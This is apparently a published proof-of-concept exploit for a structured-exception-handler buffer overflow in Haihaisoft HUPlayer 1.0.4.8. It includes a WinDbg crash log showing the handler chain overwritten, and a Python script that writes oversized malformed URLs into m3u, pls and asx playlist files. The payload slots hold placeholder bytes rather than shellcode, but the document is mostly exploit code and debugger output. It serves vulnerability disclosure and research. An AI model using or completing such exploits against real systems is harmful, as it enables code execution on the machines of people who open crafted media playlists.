56 lines
No EOL
2.4 KiB
Python
Executable file
56 lines
No EOL
2.4 KiB
Python
Executable file
#-----------------------------------------------------------------------------#
|
|
# Exploit Title: Haihaisoft HUPlayer 1.0.4.8 - Buffer Overflow (SEH) #
|
|
# Date: Mar 25 2014 #
|
|
# Exploit Author: Gabor Seljan #
|
|
# Software Link: http://www.haihaisoft.com/huplayer.aspx #
|
|
# Version: 1.0.4.8 #
|
|
# Tested on: Windows XP SP3 #
|
|
#-----------------------------------------------------------------------------#
|
|
|
|
# (59c.5c4): Access violation - code c0000005 (first chance)
|
|
# First chance exceptions are reported before any exception handling.
|
|
# This exception may be expected and handled.
|
|
# eax=00000003 ebx=0141897a ecx=44444444 edx=01e28c98 esi=01e28c99 edi=01e28367
|
|
# eip=0044754f esp=01e27b3c ebp=0000079d iopl=0 nv up ei pl nz na po nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
|
|
# *** ERROR: Module load completed but symbols could not be loaded for mpc-hc.exe
|
|
# mpc_hc+0x4754f:
|
|
# 0044754f 3b69f4 cmp ebp,dword ptr [ecx-0Ch] ds:0023:44444438=????????
|
|
# 0:005> g
|
|
# (59c.5c4): Access violation - code c0000005 (first chance)
|
|
# First chance exceptions are reported before any exception handling.
|
|
# This exception may be expected and handled.
|
|
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
|
|
# eip=43434343 esp=01e2776c ebp=01e2778c iopl=0 nv up ei pl zr na pe nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
|
# 43434343 ?? ???
|
|
# 0:005> !exchain
|
|
# 01e27780: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
|
|
# 01e28b68: 43434343
|
|
# Invalid exception stack at 42424242
|
|
|
|
#!/usr/bin/python
|
|
|
|
junk1 = "\x80" * 50;
|
|
offset = "\x41" * 1595;
|
|
nSEH = "\x42" * 4;
|
|
SEH = "\x43" * 4;
|
|
junk2 = "\x44" * 5000;
|
|
|
|
evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())
|
|
|
|
for e in ['m3u', 'pls', 'asx']:
|
|
if e is 'm3u':
|
|
poc = evil
|
|
elif e is 'pls':
|
|
poc = "[playlist]\nFile1={}".format(evil)
|
|
else:
|
|
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
|
|
try:
|
|
print("[*] Creating poc.%s file..." % e)
|
|
f = open('poc.%s' % e, 'w')
|
|
f.write(poc)
|
|
f.close()
|
|
print("[*] %s file successfully created!" % f.name)
|
|
except:
|
|
print("[!] Error while creating exploit file!") |